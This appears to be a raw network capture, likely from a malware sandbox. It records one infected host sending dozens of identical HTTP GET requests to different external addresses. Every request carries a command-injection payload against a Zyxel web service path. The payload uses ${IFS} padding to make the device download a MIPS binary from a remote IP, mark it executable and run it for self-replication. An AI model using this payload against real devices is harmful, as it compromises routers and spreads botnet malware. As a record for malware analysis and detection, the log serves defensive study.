                                      Jan 19, 2024 17:29:30.730428934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3918192.168.2.1441414180.14.253.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730473995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3919192.168.2.145136076.127.12.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730488062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3920192.168.2.1439838205.241.62.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730534077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3921192.168.2.143689661.165.238.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730576992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3922192.168.2.144757897.140.135.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730607986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3923192.168.2.1456868183.247.228.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730634928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3924192.168.2.145270861.127.15.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730691910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3925192.168.2.1460390143.59.111.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730736017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3926192.168.2.145630280.83.176.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730761051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3927192.168.2.1452364133.1.85.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730796099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3928192.168.2.145713683.254.21.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730839968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3929192.168.2.143868625.77.37.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730880976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3930192.168.2.1455920208.211.128.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730902910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3931192.168.2.143666224.184.120.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730942011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3932192.168.2.143479419.23.161.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730995893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3933192.168.2.1437696221.61.39.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731040001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3934192.168.2.1434612142.242.166.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731077909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3935192.168.2.1446850162.84.184.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731105089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3936192.168.2.144660083.231.36.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731127024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3937192.168.2.145293452.155.190.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731177092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3938192.168.2.1456568191.14.222.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731204033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3939192.168.2.14511428.217.33.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731242895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3940192.168.2.144657231.175.207.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731267929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3941192.168.2.1439116186.236.11.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731282949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3942192.168.2.1438140191.0.38.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731332064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3943192.168.2.1458276222.243.227.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731348991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3944192.168.2.145177660.26.63.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731401920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3945192.168.2.1436676118.106.168.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731450081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3946192.168.2.1453480107.54.252.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731479883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3947192.168.2.1434304164.45.47.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731523037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3948192.168.2.1460948211.115.233.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731547117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3949192.168.2.1439044104.213.174.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731570005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3950192.168.2.1455912216.233.43.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731611967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3951192.168.2.1438812114.138.188.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731663942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3952192.168.2.143686640.80.186.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731692076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3953192.168.2.144051272.107.180.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731734037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3954192.168.2.1446528136.59.61.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731764078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3955192.168.2.144784482.193.43.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731806993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3956192.168.2.1453888205.44.65.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731834888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3957192.168.2.143916083.136.131.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731868982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3958192.168.2.145886698.40.71.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731937885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3959192.168.2.144528624.191.18.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.731986046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3960192.168.2.144667897.104.69.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732040882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3961192.168.2.1434312153.126.91.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732079029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3962192.168.2.145075812.132.138.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732112885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3963192.168.2.1433646158.179.162.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732167959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3964192.168.2.1436252102.254.60.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732171059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3965192.168.2.144271627.228.102.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732219934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3966192.168.2.1456942209.253.51.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732254982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3967192.168.2.143654483.5.13.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732316971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3968192.168.2.1460786184.217.64.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732355118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3969192.168.2.145769487.112.150.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732389927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3970192.168.2.1448752121.174.176.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732409000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3971192.168.2.1444122217.118.182.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732482910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3972192.168.2.1450562139.224.89.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732505083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3973192.168.2.144945498.14.96.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732544899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3974192.168.2.1454092183.85.95.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732544899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3975192.168.2.1452930159.115.82.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732577085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3976192.168.2.146016443.58.255.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732630968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3977192.168.2.145099647.137.27.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732669115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3978192.168.2.145113668.53.155.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732721090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3979192.168.2.1445312106.176.222.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732758999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3980192.168.2.14483382.156.43.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.732789040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3981192.168.2.1442012153.185.14.61443
                                      TimestampBytes transferredDirectionData
